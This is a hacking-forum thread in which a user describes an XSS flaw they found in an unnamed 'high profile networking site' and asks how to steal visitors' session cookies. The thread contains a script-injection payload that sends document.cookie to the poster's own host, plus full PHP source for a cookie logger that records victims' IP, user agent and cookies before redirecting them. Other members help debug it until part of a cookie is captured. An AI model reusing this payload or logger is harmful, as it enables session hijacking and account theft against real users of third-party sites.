Donate to us via Paypal!
Never in the field of human conflict was so much owed by so many to so few. - Winston Churchill
Thursday, October 29, 2020
Navigation
Home
 Find:
 Information:
Learn
Communicate
Submit
Shop
Challenges
 Exploit:
 Programming:
 Think:
 Track:
 Patch:
 Other:
 Need Help?
Other
Members Online
Total Online: 97
Guests Online: 96
Members Online: 1

Registered Members: 129474
Newest Member: ZoboCop2
Latest Articles

View Thread

HellBound Hackers | Computer General | Web hacking

Author

One-Click XSS Cookie Logger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-08-07 23:17
Okay, so.

I've found an XSS vulnerability in a high profile networking site.
The url looks something like this:

"http://doesntconcernyou.com/youdontneedtoknow.php?safdasdf=sadfas&blank="

an injection such as the following after the "blank" variable works:
Code
<script>window.location="http://www.goatse.cz";</script>




however, I don't merely want to send people to goatse. I'd like to grab their cookies. So when I attempt to craft a url to send them to my logging hub, like so:

Code
<script>window.location="http://mysite.com/victimsite/oneclick/index.php?c00kie="+document.cookie;</script>




the injection does not work. any idea as to what I could be doing wrong? here's the source to the logger:

Code
<?php

$ip = $_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$referer = $_SERVER['HTTP_REFERER'];
$cookie = stripslashes( $_GET['c00kie'] );

$string = $ip . "\n" . $user_agent . "\n" . $referer . "\n" . $cookie;

$fp = fopen('log.txt', 'a');
fwrite($fp, $string . "\n\n");
fclose($fp);

Header ("Location: http://victimsite.com/nonsuspiciouslookingpage");

?>





Author

RE: One-Click XSS Cookie Logger

spyware
Member



Posts: 4192
Location:
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 13-08-07 23:28
Does the "+" get filtered maybe?



img507.imageshack.us/img507/3580/spynewsig3il1.png
"The chowner of property." - Zeph
[small]
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
[center]�Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?� - Ebert[/ce
Author

RE: One-Click XSS Cookie Logger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-08-07 23:40
hm, perhaps, let me try encoding it.


Author

RE: One-Click XSS Cookie Logger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-08-07 23:45
aha! that kinda works. I'm getting a part of the cookie.


Author

RE: One-Click XSS Cookie Logger

spyware
Member



Posts: 4192
Location:
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 13-08-07 23:46
lesserlightsofheaven wrote:
aha! that kinda works. I'm getting a part of the cookie.


What part are you NOT getting?



img507.imageshack.us/img507/3580/spynewsig3il1.png
"The chowner of property." - Zeph
[small]
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
[center]�Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?� - Ebert[/ce
Author

RE: One-Click XSS Cookie Logger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-08-07 23:55
all the juicy bits, sadly =P.

one part of the cookie contains the IP, another the location, and the next two are long hashed values.

all I get is the IP.